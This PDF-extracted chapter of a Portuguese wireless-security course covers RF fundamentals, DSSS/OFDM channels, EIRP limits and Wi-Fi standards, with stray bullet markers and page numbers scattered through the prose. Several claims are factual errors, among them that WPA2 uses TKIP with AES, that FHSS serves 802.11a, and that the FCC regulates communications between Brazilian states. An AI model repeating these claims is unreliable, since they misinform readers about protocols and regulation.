Observe que a característica de múltiplos caminhos das ondas foi aproveitada no conceito de Multiple-Input Multiple-Output (MIMO), para aumentar a taxa física de transferência de dados no padrão IEEE 802.11n. Dotados de múltiplas antenas de transmissão e recepção, os equipamentos da próxima geração de WLAN atingirão velocidades de 108 mpbs, graças a este problema das redes 802.11a/b/g.

Espalhamento
Segurança em Redes sem Fio

Obstáculo pequeno comparado com o comprimento de onda. Tipos: 11 Onda se depara com uma superfície irregular e é refletida em várias direções. 11 Ondas se refletem em uma escala menor, em partículas pequenas. Sinal resultante é fraco demais.

q

O fenômeno do espalhamento pode ocorrer de duas formas. Uma delas é quando uma onda se depara com uma superfície irregular e é refletida em muitas direções simultaneamente.

6

Depois que isso ocorre, o sinal pode se dividir em vários sinais resultantes, que podem ter intensidade insuficiente para ter utilidade para o receptor. Outra forma de espalhamento ocorre quando as ondas atravessam um meio com partículas em suspensão. Como exemplo de espalhamento, citamos uma onda atravessando uma região com alta densidade de poeira suspensa no ar, fenômeno típico do ambiente de certas fábricas.

Difração
11 Fenômeno confundido com refração – onda atravessando um meio diferente. 11 Ondas de RF contornando um obstáculo. 11 Compare com ondas na água contornando um objeto na superfície.

q

em torno de uma aresta

a uma abertura estreita

a uma grande distância
Figura 1.2 A difração.
Capítulo 1 - História, padrões e fundamentos de radiofrequência

Saiba mais

l

Quando as ondas passam por um espaço pequeno ou em torno de um objeto pequeno, ocorre mudança na direção da onda. Esse fenômeno, que também pode causar perda no sinal, se chama difração. Para que esse fenômeno ocorra, o tamanho do obstáculo deve ser menor que o comprimento de onda.

A difração ocorre em todas as formas de ondas progressivas – eletromagnéticas, som e água – e explica por que ondas de rádio longas contornam montanhas mais facilmente que ondas de rádio curtas.

Refração
11 Mudança na direção das ondas ao passar por um meio diferente. 11 Mais comum em transmissões de longa distância.

q

7

Ar Água Profundidade aparente Profundidade real Imagem do objeto
Figura 1.3 O fenômeno chamado de refração.

Outra causa comum de perda do sinal RF é a refração, a mudança na direção das ondas ao passar de um meio para outro, com densidade diferente. Esse fenômeno pode ocorrer quando as ondas atravessam o vidro; quando, por exemplo, passam por um aquário (ar, vidro, água, vidro e ar novamente, sem levar em conta outros fenômenos). O índice de refração do meio determina a mudança no ângulo de propagação da onda.

É bom lembrar que um mesmo tipo de meio pode ter índices de refração diferentes, e o mais comum de se constatar é a diferença entre ar frio e ar quente. Refração não é um problema para pequenos ambientes, mas sim para a transmissão entre pontos distantes e sujeitos a mudanças de condições atmosféricas.

LOS
11 Line of Sight ou Linha de Visada. 11 Linha aparente que liga receptor e transmissor. 11 Considerar a curvatura da Terra para longas distâncias. 11 Zona Fresnel (“fra-NEL”) não pode ser obstruída.

q

d

r

Segurança em Redes sem Fio

r (em metros) = 17.32 x

d 4f

(em Km) (em GHz)

r (em pés) = 72.05 x

d 4f

(em milhas) (em GHz)

Figura 1.4 LOS e a Zona Fresnel.

Como já comentamos anteriormente, obstáculos entre o transmissor e o receptor podem causar diversos tipos de perda. Entretanto, não mencionamos em nenhum momento qual deve ser a área livre de obstruções.

8

Considere uma linha imaginária que liga transmissor e receptor, considerando a curvatura da Terra para longas distâncias. LOS é essa linha imaginária que liga os dois pontos. Entretanto, apenas uma linha reta desobstruída não é suficiente para ondas RF, pois se uma determinada área em torno da LOS é obstruída, o sinal RF pode sofrer interferência. Essa área imaginária é denominada Zona Fresnel (pronuncia-se “fra-NEL”) e tem seu raio calcu lado da seguinte forma: R = 17,32 x √d/4f, onde: d = distância do link em Km F = frequência em GHz r = raio em metrosEmbora obstruções de 20 a 40% da Zona Fresnel causem pouco impacto no link, é recomendável que não haja obstrução alguma nessa área.

VSWR
11 Voltage Standing Wave Radio. 11 Ocorre quando impedâncias de cabos e conectores não combinam; reflexão de corrente de volta para o transmissor. 11 Não possui unidade de medida. 22 1:1 VSWR perfeito. 22 1.5:1 VSWR típico. 11 Pode causar danos a um equipamento que não prevê essa falha de instalação.

q

A impedância, medida em Ohms, é a medida da resistência ao fluxo de corrente. Maior resis tência significa menos corrente atravessando o componente, ou seja, se a corrente passa de um componente elétrico com impedância menor (50 Ohms, por exemplo) para outro compo nente com impedância maior (75 Ohms), o fluxo de corrente é reduzido. Essa redução no fluxo é indicada por Voltage Standing Wave Ratio (VSWR), a razão entre a impedância do dispositivo e a impedância perfeita, denotada pelo valor 1. Um valor de VSWR perfeito é 1:1, o valor típico é 1.5:1. Um valor de VSWR maior que o típico pode causar retorno de sinal para o equipamento que, se não possuir proteção, poderá ser danificado. VSWR pode ser evitada simplesmente pela combinação correta de impedâncias de cabos, conectores e dispositivos. A impedância típica é de 50 Ω.
Capítulo 1 - História, padrões e fundamentos de radiofrequência

Antenas – Ganho
11 Dispositivo passivo. 11 Transforma sinais de RF em ondas de rádio no ar. 11 Campos elétricos emitidos são chamados de raios ou lóbulos. 11 Beamwidth é a medida em graus do foco de radiação. 11 Categorias de antena: 22 Omnidirecional. 22 Semidirecional. 22 Altamente direcional.

q

Antenas são dispositivos que convertem sinais de RF em ondas de rádio no ar. São disposi tivos passivos, ou seja, não aumentam a potência do sinal RF.

9

Existem três categorias genéricas de antena, cada uma delas com ganhos adequados a um determinado tipo de aplicação. Antenas omnidirecionais são as mais comuns, encontradas tanto no AP quanto nos clientes. Transmitem e recebem ondas de RF em 360º em torno do seu eixo, normalmente horizontal – perpendicular à superfície da Terra. As outras categorias de antena – semidirecional e altamente direcional – têm aplicações diferentes, tais como links de grandes distâncias ou mesmo atividades de auditoria como wardriving e warwalking. Ao focar o raio da antena, o ganho da antena (em dBi) aumenta. O chamado “beamwidth” é a medida desse foco, ou seja, a largura do sinal RF que a antena transmite.

Potência de radiação
11 Intentional Radiator (IR). 11 Qualquer equipamento que irradia sinais de RF. 11 Potência de saída, sem considerar antena. 22 Leva em consideração perda de potência em cabos e conectores. 22 Access Point. 33 Apenas dispositivo de RF em si, cabos e conectores.

q

Intentional Radiator (IR) é um termo que descreve um sistema responsável por irradiar sinais de RF. No caso de um Access Point, o IR é composto de todos os elementos do dispositivo (transmissor, cabos e conectores), exceto a antena. É muito importante distinguir IR de EIRP, conceito que veremos a seguir. Embora órgãos como FCC e Anatel não definam um IR máximo permitido, é bom lembrar que, depois de combinado com uma antena, o sinal RF emitido por um IR pode facilmente ultrapassar os limites permitidos.

Equivalent Isotropically Radiated Power (EIRP)
11 IR acrescido do ganho da antena: potência de saída de todo o conjunto. 11 WLAN exige comunicação em duas vias para associação. 22 AP “enxerga” o cliente. 22 Cliente “enxerga” o AP. 22 Para auditar redes, basta que o cliente capte os sinais dos APs e de outros clientes – antena de alto ganho. Equivalent Isotropically Radiated Power (EIRP) é a potência irradiada pelo sistema de RF como um todo, ou seja, Intentional Radiator (IR) e antena. É muito importante que o admi -

q

nistrador de uma rede sem fio conheça o valor estimado do EIRP, uma vez que órgãos como a Federal Communications Commission (FCC) e a Agência Nacional de Telecomunicações determinam uma potência máxima para o transmissor. A seguir, serão apresentados alguns
Segurança em Redes sem Fio

conceitos básicos de “matemática RF”, que serão úteis no cálculo desse valor. Nos EUA, a FCC determina que o EIRP não pode exceder 1 watt, para aplicações em ambientes fechados, e 4 watts para ambientes abertos. No Brasil, a Anatel determina que na faixa de frequência que engloba as redes 802.11b/g, o EIRP (ou seja, o IR acrescido de ganho da antena) não pode exceder 400 mW em cidades com mais de 50 mil habitantes. Não é difícil exceder esse limite, levando em consideração a potência comum das interfaces de rede (50-100 mW) e o ganho obtido com antenas. As condições de uso são descritas na Resolução 506 da Anatel, de 1º de julho de 2008.

10

Para que um cliente seja capaz de se associar a um AP, é necessário que a intensidade de sinal deste último seja suficiente. Assim, um auditor que capte sinais de uma rede com o auxílio de uma antena semidirecional será capaz de se associar à rede somente se o AP também for capaz de captar seus sinais de RF. É necessário, portanto, que ambos os pontos se “enxerguem”.

Matemática RF
11 Ganho e perda medidos em decibéis (dB). 11 dBm: 1 milliwatt (1 mW) referência de potência absoluta. 11 dBi: mesma medida de dBm, mas tem como referência um irradiador isotrópico (sol). 11 Escala logarítmica: 22 -3dB: metade da potência em mW. 22 +3dB: dobro da potência em mW. 22 -10dB: um décimo da potência em mW. 22 +10dB: aumenta em 10 vezes a potência em mW. 11 +23 dBm = 10 + 10 + 3 = aumenta em 200 vezes.

q

Um link de RF deve ter potência compatível com aquela determinada pelos órgãos regu ladores. Para que o administrador da rede seja capaz de assegurar que isso não acon teça, é necessário que ele conheça o básico de “matemática RF” para calcular o valor do EIRP de seus APs. Ao calcular a potência de sua WLAN, o administrador deve levar em consideração alguns fatores: 11 Perdas e ganhos de cabos e conectores; 11 Intentional Radiator (IR); 11 Potência do dispositivo transmissor; 11 Equivalent Isotropically Radiated Power (EIRP). Alguns valores-chave devem ser conhecidos antes de se iniciar o cálculo: uma antena com ganho de 3 dB duplica a potência do IR, enquanto uma antena com ganho de 10 dB aumenta em dez vezes a potência do IR. Dispositivos como atenuadores causam o efeito contrário, ou conectores devem ser levadas em consideração no cálculo da potência do IR. A seguir, você pode ver um exemplo para facilitar o entendimento: Access Point (100 mW) + cabo (~ -2 dB) + conectores (~ -1 dB) + antena de 10 dB = (100 mW/2) * 10 = 500 mW
Capítulo 1 - História, padrões e fundamentos de radiofrequência

seja, reduzem o valor de IR na mesma proporção. Lembre-se de que as perdas com cabos e

Exercício de fixação 1 e Fundamentos de radiofrequência
1. Quais são as causas de perda de um sinal RF?

11

2. Que fatores um administrador de rede deve levar em conta para calcular a potência de

sua WLAN?

Tecnologias de transmissão
Espalhamento espectral (Spread Spectrum): 11 Energia média do sinal transmitido é espalhada sobre uma largura de faixa muito maior do que a largura de faixa que contém a informação. 11 Grande largura de banda e baixa potência de pico. Spread Spectrum é uma tecnologia de transmissão que tem como características principais a grande largura de banda e a baixa potência de pico. Sinais transmitidos por Spread Spectrum

q

são como ruído, difíceis de serem interceptados ou demodulados sem equipamento adequado. Essa tecnologia compensa o uso de uma maior largura de faixa de transmissão com uma melhora na rejeição aos sinais interferentes de outros sistemas operando na mesma faixa de frequência. Essa característica é especialmente interessante para WLANs, uma vez que outros tipos de equipamento operam na mesma frequência, como telefones sem fio, Bluetooth e fornos de micro-ondas.

Implementações de Spread Spectrum
FHSS: 11 802.11: 1ª geração, Bluetooth, babás eletrônicas e telefones sem fio. DSSS: 11 802.11, 802.11b e 802.11g. OFDM: 11 802.11ª. 11 Orthogonal Frequency Division Multiplexing (OFDM). 11 Transporte de camada física em alta velocidade.

q

Somente duas implementações de Spread Spectrum são especificadas pela FCC: Frequency Hopping Spread Spectrum (FHSS) e Direct Sequence Spread Spectrum (DSS). Considerando que a FCC é um dos principais órgãos reguladores do mundo, podemos afirmar que essas são as principais tecnologias de Spread Spectrum utilizadas. Orthogonal Frequency Division Multiplexing (OFDM) não é uma implementação de Spread Spectrum, mas é o principal transporte de camada física de redes sem fio de alta velocidade.
Segurança em Redes sem Fio

Veremos, a seguir, conceitos básicos das tecnologias de Spread Spectrum mais utilizadas: DSSS e OFDM.

12

Direct Sequence Spread Spectrum (DSSS)
11 Maiores taxas de transferência que FHSS e mais sujeito a interferências. 11 Padrão IEEE para DSSS na faixa 2.4 GHz ISM: 22 1 a 2 Mbps para 802.11 (não é 802.11a). 22 5.5 e 11 Mbps para 802.11b. 22 54 Mbps para 802.11g, 5.5 e 11 Mbps para compatibilidade com 802.11b.

q

Direct Sequence Spread Spectrum (DSSS) é a tecnologia de Spread Spectrum mais utilizada, principalmente por oferecer taxas de transmissão de dados mais altas do que FHSS. Dife rente de FHSS: tecnologia usada em Bluetooth e 802.11a – DSSS é mais suscetível a interfe rências por outras aplicações que usem as mesmas frequências. 11 Cada canal tem 22 MHz de largura. 22 Canal 1: 33 2.401 GHz a 2.423 GHz 33 Frequência central 2.412 GHz 11 Adicione 5 à frequência central para obter a frequência do próximo canal. 11 Adicione e subtraia 11 para obter o intervalo de spread (espalhamento) do canal. 22 Canais 1-11 para os EUA. 22 Canais 10-13 para a França. 22 Canal 1-14 para o Japão. DSSS é um método de envio de dados no qual tanto o sistema transmissor quanto o receptor operam num conjunto de frequências numa abrangência de 22 MHz. A frequência selecionada em uma interface de rede é a frequência central do canal; isso quer dizer que, para o canal 1, a frequência central é de 2.412 GHz, mas o canal inclui a faixa de frequências que vai de 2.401 GHz a 2.423 GHz, mais e menos 11 MHz, respectivamente. A frequência central do canal 2 é obtida somando 5 à frequência central do canal 1, ou seja, 2.412 GHz + 5 MHz = 2.417 GHz. Note que, entre o canal 1 e o 2, há uma faixa de frequências sobreposta, problema que abordaremos a seguir.
Figura 1.5 Os canais, com destaque para a não sobreposição dos canais utilizados no Brasil.
Capítulo 1 - História, padrões e fundamentos de radiofrequência

q

No Japão, é utilizado o canal 14 (2.487 GHz). Já a Europa possui 13 canais, sendo que a França faz uso apenas dos canais de 10 a 13. É interessante observar que a interface de rede (e respectivo driver) à disposição do auditor deve permitir operação no canal 14. Atacantes podem instalar Access Points inadvertidamente, usando esse canal com o objetivo de se tornarem “invisíveis” para um administrador que monitora apenas os canais mais típicos, de 1 a 11.

Canais
1 2 3 4 5 6 7 8 9 10 11 12 13 14

2.402 GHz

22 MHz

2.483 GHz

13

Como vimos antes, a alocação dos canais em redes 802.11b/g tem algumas características básicas: 11 Início nos canais 1 a 2.412 GHz, término nos canais 11 a 2.462 GHz; 11 Incrementos de 5 MHz (frequência central); 11 Canais com largura de 22 MHz; 11 Canais 12 a 14 fora dos EUA. Visualizando canal a canal em um gráfico, fica claro que há sobreposição entre os canais. Isso significa que, se houver um AP operando no canal 1 e outro no mesmo ambiente, ope rando no canal 2, haverá colisões e, consequentemente, retransmissão de pacotes. Para evitar que colisões aconteçam, recomenda-se a seguinte distribuição de canais na implantação de Access Points em um mesmo ambiente: 11 Apenas 3 canais não se sobrepõem: 1, 6 e 11; 11 Sobreposição mínima: canais 1, 4, 8 e 11.

1

1

6 11 11
Figura 1.6 Projeto de rede WLAN com utilização de intersecção de células com canais não sobrepostos.

1

Orthogonal Frequency Division Multiplexing (OFDM)
11 IEEE 802.11a. 11 Maior throughput: cada subcanal usado em paralelo. 11 Cada canal tem 20 MHz de largura. 22 52 subcanais (DSSS tem apenas 1). 22 48 para transmissão de dados e 4 para monitoração. 11 Não usa Spread Spectrum, como FHSS e DSSS. 11 Uso de banda de 5 GHz. 11 DSSS é uma “torneira”.
Segurança em Redes sem Fio

q

11 OFDM é um “chuveiro”. Orthogonal Frequency Division Multiplexing (OFDM), diferente de FHSS e DSSS, não usa os princípios de Spread Spectrum na comunicação. É o mecanismo de transmissão de camada física utilizado por redes 802.11a, que opera a 5 GHz em de 2.4 GHz, como 802.11b/g. OFDM organiza a camada física em canais de operação que operam em paralelo. Cada canal de 20 MHz com 52 subportadoras, 4 delas usadas para monitoração. Cada um desses 48 subcanais é usado para transmitir dados, o que aumenta consideravelmente a taxa de transmissão.

14

Lower and Middle U-NII Bands: 8 Carriers in 200 MHz / 20 MHz Spacing
30 MHz 30 MHz

5150
Lower Band Edge

5180

5200

5220

5240

5260

5280

5300

5320

5350
Upper Band Edge

Upper U-NII Bands: 4 Carriers in 100 MHz / 20 MHz Spacing
20 MHz 20 MHz

Figura 1.7 Imagem que ilustra as portadoras em 50 GHz.

5725

5745

5765

5785

5805

5825

Lower Band Edge

Upper Band Edge

Intersecção em canais OFDM: 11 A largura de banda ISM de 5GHz não é contínua. Existem duas áreas: 5.15GHz – 5,35GHz e 5.725GHz – 5.825GHz; 11 As subportadoras dos sinais OFDM são moduladas de tal forma que, embora os “ombros” dos canais adjacentes se sobreponham, os sinais não interferem uns nos outros, pro vendo assim 8 canais sem sobreposição na primeira área (5.15GHz - 5,35 GHz) e 5 canais sem sobreposição na segunda (5.725GHz - 5.825GHz). Para ilustrar melhor a diferença entre DSSS e OFDM, pense em: 11 DSSS (22 MHz) como uma “torneira”, um único subcanal; 11 OFDM (20 MHz) como um “chuveiro”, com 52 subcanais diferentes. Vantagens: 11 Maior frequência, menor alcance. 11 Lida melhor com multipath (múltiplas reflexões). 11 Atualmente sujeito a menor interferência – faixa pouco usada. 22 Frequência de 5 GHZ – segurança por obscuridade. Desvantagens: 11 Menor alcance. 11 Equipamentos mais caros. 11 Não compatível com 802.11b/g. Multiple-Input, Multiple-Output (MIMO) é baseado nesta modulação e na frequência de 5 GHz. Como vantagens da OFDM, podemos citar a menor possibilidade de interferência por multipath devido às técnicas de modulação usadas. Outras vantagens são a maior taxa de transferência e a menor probabilidade de interferência, uma vez que a faixa de frequência de 5 GHz é menos “povoada” que 2.4 GHz.

q
Capítulo 1 - História, padrões e fundamentos de radiofrequência

15

Mas OFDM também tem algumas desvantagens, e as principais são a abrangência menor, comparada a redes 2.4 GHz, e a falta de interoperabilidade com equipamentos 802.11b e 802.11g. Pode-se considerar, como outra desvantagem, o preço de equipamentos 802.11a, mais alto do que os populares 802.11b e 802.11g.

Exercício de fixação 2 e Tecnologias de transmissão
O que são DSSS e OFDM?

Organizações e padrões
Vamos conhecer agora as organizações que definem os padrões usados em redes 802.11 e 802.11a/b/g, além de alguns padrões, como WPA2, WPA2, IETF e IEEE. Organizações: 11 US Federal Communications Commission (FCC). 11 Agência Nacional de Telecomunicações (Anatel). 11 Institute of Electrical and Electronics Engineers (IEEE). 11 Internet Engineering Task Force (IETF). 11 Wi-Fi Alliance. 11 European Tellecomunications Standards Institute (ETSI). Embora não seja essencial, é interessante conhecer um pouco sobre as organizações que definem os padrões usados em redes 802.11 e 802.11a/b/g. Conhecendo as organizações,

q

poderemos distinguir um padrão (802.11b) de um selo de interoperabilidade, assim como os definidos pela Wi-Fi Alliance. 11 FCC: regulamenta comunicações entre estados brasileiros e ligações internacionais nos EUA. Determina que a potência máxima de saída é 1W (30 dBm), e que o EIRP máximo é 4 W (36 dBm). Determina quais são as bandas livres de licença, chamadas de ISM (Industrial, Scientifical and Medical) nos EUA; 11 IEEE: desenvolve padrões de camada 1 e 2 (PHY e MAC); 11 IETF: responsável pelas camadas 3 e superiores; 11 Wi-Fi Alliance: garante a interoperabilidade de produtos. Não determina padrões, é basicamente uma organização de marketing. Determinou duas especificações bem conhecidas: WPA e WPA2;
Segurança em Redes sem Fio

11 ETSI: desempenha na Europa o mesmo papel do IEEE.

Padrões Wi-Fi Alliance
WPA
11 Wi-Fi Protected Access (pré-padrão) 11 Missão de substituir WEP (Wired Equivalent Privacy). 11 Temporal Key Integrity Protocol (TKIP) como cipher suite.

q

16

11 RC4 como algoritmo de criptografia. 22 WEP também emprega RC4. 11 Baseado na versão draft de 802.11i (2003). 11 Trabalho conjunto entre o grupo de trabalho 802.11i e Wi-Fi Alliance. 11 Autenticação: 22 WPA Personal – WPA-PSK. 22 WPA Enterprise – 802.1x com EAP. Ao contrário do que muitos pensam, Wi-Fi Protected Access (WPA) não é um padrão, mas

q

sim uma certificação de interoperabilidade criada pela Wi-Fi Alliance em 2003. Diferente da IEEE, que define especificações, a Wi-Fi Alliance cuida de um programa de certificação que atesta que um dado equipamento tem interoperabilidade garantida com outros equipamentos. WPA foi criado num trabalho conjunto entre IEEE e Wi-Fi Alliance para sanar as vulnerabilidades de WEP enquanto o padrão 802.11i não era concluído, fato que ocorreu somente em 2004. O padrão 802.11i também é conhecido como WPA2 e emprega o novo cipher suite TKIP, que emprega o algoritmo de criptografia Advanced Encryption Standard (AES) no lugar do RC4 utilizado em WEP. Um dos requisitos de seu desenvolvimento foi a necessidade de ser implantado como atualização de software, ou seja, utilizando o mesmo hardware de WEP. WPA emprega Temporal Key Integrity Protocol (TKIP), que substitui WEP por um novo algo ritmo de criptografia. WPA, assim como Dynamic WEP, também permite que seja utilizado 802.1x associado com um método Extensible Authentication Protocol (EAP) para autenti cação, o chamado WPA Enterprise. Tal como WEP, também é possível utilizar autenticação por chave pré-compartilhada, denominada WPA Personal ou WPA-PSK (Pre-Shared Key).

WPA2
11 Wi-Fi Protected Access 2. 11 Baseado em 802.11i ratificado (2004). 11 Implementação do cipher suite CCMP com criptografia AES. 11 Normalmente requer novo hardware.

q

11 Autenticação: WPA2 Enterprise ou WPA2 Personal. WPA2 é outro selo Wi-Fi Alliance que muitos confundem com padrão. Ele nada mais é do que a garantia de interoperabilidade entre dispositivos levando em conta a versão ratificada de 802.11i, publicada em 2004. WPA, por sua vez, garantia a interoperabilidade com base na versão draft de 802.11i, publicada em 2003. WPA2 implementa o algoritmo de criptografia AES como parte do cipher suite CCMP (Counter-Mode/Cipher Block Chaining Message Authentication Code Protocol), aprovado pelo FIPS (Federal Information Processing Standard) como algoritmo para proteção de dados sigilosos aprovado para aplicações do governo norte-americano. Produtos certificados como WPA2 são compatíveis com WPA, mas o inverso nem sempre ocorre – WPA2 exige mais recursos de hardware para processar o algoritmo Advanced Encryption Standard (AES). Assim como WPA, WPA2 oferece dois modos de operação: WPA2-PSK, também conhecido como WPA2 Personal, e WPA2 Enterprise. WPA2 por si só é um mecanismo de segurança pouco explorado, associado a 802.1x e um bom método EAP, como EAP-TLS, torna-se a opção mais segura de rede sem fio hoje.

Capítulo 1 - História, padrões e fundamentos de radiofrequência

22 AES – mais recursos de processamento que RC4.

17

Padrões IETF
RADIUS: 11 RFC 2138: Remote Authentication Dial In User Service (RADIUS) e RFC 2139 – RADIUS Accounting. 11 AP: Network Access Server (NAS) habilitado com 802.1x. 11 Protocolo Authentication, Authorization, Accounting (AAA): protocolo de autenticação utilizado por 802.1x. EAP: 11 RFC 3748: Extensible Authentication Protocol. 11 Um dos esquemas de autenticação usado por RADIUS para verificar credenciais. 11 Alguns protocolos: PEAP, EAP-TLS etc. Dois padrões da IETF são muito importantes em redes seguras: RADIUS e EAP. Remote Authentication Dial In User Service (RADIUS) é um protocolo (Authentication,

q

Authorization and Accounting AAA) para aplicações como acesso à rede ou mobilidade IP. Foi criado originalmente para autenticar usuários de um Internet Service Provider (ISP) conectando por modem, DSL ou cabo. O acesso à porta só é concedido após a autenti cação, assim como ocorre em um Access Point. Extensible Authentication Protocol (EAP) é um framework de autenticação adotado pelos padrões WPA (TKIP/RC4) e WPA2 (CCMP/AES) para prover autenticação. EAP provê meca nismos de autenticação, denominados métodos EAP. Os mais comuns em redes sem fio são: 11 EAP-TLS; 11 EAP-SIM; 11 EAP-AKA; 11 PEAP; 11 LEAP; 11 EAP-TTLS. Neste capítulo, veremos com mais detalhes EAP-TLS, um dos métodos mais seguros atual mente. EAP é usado pelo AP, que na arquitetura RADIUS é um Network Access Server (NAS). Um método EAP pode fornecer um mecanismo seguro de negociação da Pairwise Master Key (PMK), usada na Capítulo com TKIP (WPA) ou CCMP (WPA2).
Framework Em desenvolvimento de software, é uma abstração que une códigos comuns entre vários projetos de software provendo uma funcionalidade genérica. Um framework pode atingir uma funcionalidade específica, por configuração, durante a programação de uma aplicação.

Padrões IEEE
Camada física (PHY): 11 802.11 (2.4 GHz).
Segurança em Redes sem Fio

q

11 802.11a (54 Mbps a 5 GHz). 11 802.11b (11 Mbps a 2.4 GHz). 11 802.11g (54 Mbps a 2.4 GHz). 11 802.11n (600 Mbps a 2.4 GHz). Como já vimos na conceituação de DSSS, a camada física é especificada pelos padrões IEEE 802.11, que determinam frequência de operação e taxa de transferência, entre outros parâmetros. A seguir, citamos outros padrões 802.11 que apóiam a operação dos padrões que determinam a operação das interfaces de rede, os conhecidos 802.11, 802.11a, 802.11b e 802.11g e o futuro 802.11n.

18

Saiba mais sobre o padrão IEEE 802.11 em “Official IEEE 802.11 Working Group Project Timelines - 2013-0322” e “IEEE P802.11 Task Group N Meeting Update”.

l

O padrão 802.11n é a especificação de IEEE para a próxima geração de interfaces 802.11, cuja versão draft foi aprovada em janeiro de 2006. Esse padrão emprega uma tecnologia que aumenta a taxa de transferência física pelo uso de múltiplas antenas, tanto no transmissor quanto no receptor. Essa tecnologia é chamada de Multiple-Input Multiple-Output (MIMO) e usa transmissão e recepção de múltiplos sinais para aumentar o desempenho da rede. Embora já existam equipamentos baseados no draft de 802.11n sendo comercializados, é bom lembrar que já foram constatados problemas de compatibilidade entre equipamentos de fabricantes diferentes, bem como interferência em redes 802.11b e 802.11g e alcance excessivo (400 metros), demasiado se for comparado ao alcance médio de 30 metros encontrado na maioria dos equipamentos 802.11b e 802.11g. A versão final da especificação é esperada para novembro de 2009.

Padrões IEEE 802.11
11 802.11i: melhorias para segurança (CCMP e TKIP). 11 802.11k: Radio Resource Management. 11 802.11m: Corrects and clarifications to IEEE 802.11-1999. 11 802.11p: Wireless Access in Vehicular Environments (WAVE). 11 802.11r: Fast Roaming. 11 802.11s: Wireless Mesh Networks. 11 802.11t: Wireless Performance Prediction. 11 802.11u: Internetworking with External Networks. 11 802.11v: Wireless Network Management. 11 802.11i: padrão já ratificado para melhor segurança. Define o protocolo TKIP para per-

q

mitir que hardwares mais antigos permitam upgrade (base da certificação WPA) e Robust Secure Networks (RSN), dirigido a novos hardwares devido aos requerimentos de AES. 11 802.11k : padroniza a maneira como as interfaces lidam com dados de nível de sinal e ruído, importantes no processo de roaming – associação a outro AP sem que a conexão seja interrompida. Hoje, fabricantes tratam do evento de roaming de formas diferentes.
Capítulo 1 - História, padrões e fundamentos de radiofrequência

11 802.11m: documentação das melhorias e funções que foram agregadas a redes 802.11-1999 pelos fabricantes, mas não incorporadas à especificação. Também chamada de 802.11ma. 11 802.11p: Wireless Access in Vehicular Environments (WAVE) é uma especificação de camada física para aplicações veiculares na faixa de 5.9 GHz. Uma das aplicações para essa especificação é a cobrança de pedágio de veículos, previamente equipados com sensores que implementem esse padrão. 11 802.11w : o grupo de trabalho 802.11w visa estender a proteção de dados aos quadros de gerenciamento, resolvendo assim alguns problemas de segurança. Envolve mudanças por software nos firmwares de clientes e access points. Provê proteção de três formas:
1. Proteção de quadros de gerenciamento broadcast, usando um Message Integrity Code

(MIC) para proteger esses quadros contra forjamento;
2. Proteção de quadros de gerenciamento unicast evitando alguns ataques de Denial of

Service (DoS);
3. Proteção de frames de associação e desassociação, provendo maneiras do cliente

verificar se o frame é válido.

19

Outros padrões IEEE
11 802.11c: Bridge Operation Procedures. 11 802.11d: operação sob outras regulações. 11 802.11e: QoS e multimídia. 11 802.11h: Spectrum and Transmit Power. 11 802.11j: operação no Japão a 4.9 e 5.1 GHz. 11 802.11p: Wireless Access in Vehicular Environments (WAVE). 11 802.11w: Protection of Management Frames. 11 802.11y: novo padrão para a banda 3.65-3.7 GHz ISM.

q

Padrões 802.11 inexistentes
11 802.11l: confusão entre L e 1; 11 802.11o: confusão com zero; 11 802.11q: confusão com 802.1q; 11 802.11x : mesmo que 802.11a/b/g (evite essa denominação); 11 802.11z: erro de digitação em um artigo da O’Reilly muito referenciado que, na realidade, tratava de 802.11a.

Tendências
Convergências. 11 VoIP Phones: 22 Wi-Fi + Skype, Wi-Fi + SIP. 22 Migração completa da telefonia convencional para certos perfis de usuário. 11 Celular + Wi-Fi. 22 T-Mobilie hotspot@home. 11 Media Players: 22 Microsoft Zune, Sandisk Sansa Connect, Apple iPod touch e iPhone.

q

Wi-Fi e telefonia IP
A empresa Skype introduziu em 2004 uma tecnologia de VoIP baseada em P2P (Peer-to-Peer), que trouxe aos usuários comuns a telefonia IP de uma maneira mais fácil. Essa populari zação de VoIP veio ao encontro da popularização de Wi-Fi, e possibilitou a associação com telefones IP sem fio. Embora Skype seja o sistema de VoIP mais utilizado, há também telefones IP sem fio base Segurança em Redes sem Fio

ados em Session Initiation Protocol (SIP): 11 Belkin Wi-Fi Phone for Skype – F1PP000GN-SK: http://www.belkin.com/ 11 T-Mobile @Home®: http://www.t-mobile.com/ 11 Sansa Connect: http://www.sandisk.com/sansa/

20

Wi-Fi a bordo
11 Acesso dentro de aviões. 11 Empresas: AirCell, Row 44, On Air, Aeromobile e Panasonic Avionics.

q

w 11 Wi-Fi e celular em aviões no Brasil em 2009.
Mais informações em: “On Air – Inflight Internet and mobile telephony on Boeing and Airbus aircraft”: http://www.onair.aero/

A TAM e a On Air anunciaram em setembro de 2008 que em 2009 os aviões Airbus A320 da TAM passariam a contar com cobertura total de voz, SMS e Blackberry. Wi-Fi faz parte do pacote de serviços da On Air. Em outubro de 2010, a TAM começou a oferecer acesso à telefonia móvel (voz, SMS e dados) em uma de suas aeronaves, e a previsão de ampliação desse serviço seria para o segundo semestre de 2011. Porém, ainda não há previsão para habilitação de redes Wi-Fi nas aeronaves da TAM.

Padrão 802.11n
11 TGn - 802.11n Enhancements for Higher Throughput. 11 Próxima geração de redes Wi-Fi. 11 Multiple-Input, Multiple-Output (MIMO). 22 600 Mbps. 11 Revolução na camada física (PHY), múltiplas antenas tanto na transmissão quanto na recepção. 11 Tira proveito de multipath. O objetivo do TGn com 802.11n é a introdução de redes com velocidades de 100 Mbps pelo uso de novas tecnologias de transmissão na camada física. Embora os APs, atualmente, normalmente tenham mais de uma antena, há apenas um conjunto de componentes para

q

Aprovação do draft de IEEE 802.11n
11 Draft proposto pelo EWC e aprovado pelo IEEE. 11 “Pre-N” e compatíveis com o draft 802.11n. 11 Risco de incompatibilidade futura. 11 Abril de 2006.

q

w 802.11n.
Saiba mais no Enhanced Wireless Consortium (EWC): http://www. enhancedwirelessconsortium.org

11 Lynksys WRT300N “Wireless-N”.

11 Versão final esperada para novembro de 2009. Em 19 de janeiro de 2006, durante a reunião do grupo de trabalho IEEE 802.11, o 802.11n Task Group (TGn) aprovou a proposta do Enhanced Wireless Consortium (EWC). Como era esperado, diversos fabricantes já lançaram produtos baseados nesse draft.

Capítulo 1 - História, padrões e fundamentos de radiofrequência

Uma curiosidade: a pronúncia correta é “My Moe”, não “Mee Moe”. Essa pronúncia foi definida como padrão numa sessão plenária da IEEE em 2004, após votação: 69 votos a favor de “My Moe”, 24 a favor de “Mee Moe” e outros 25 que se abstiveram de votar.

l

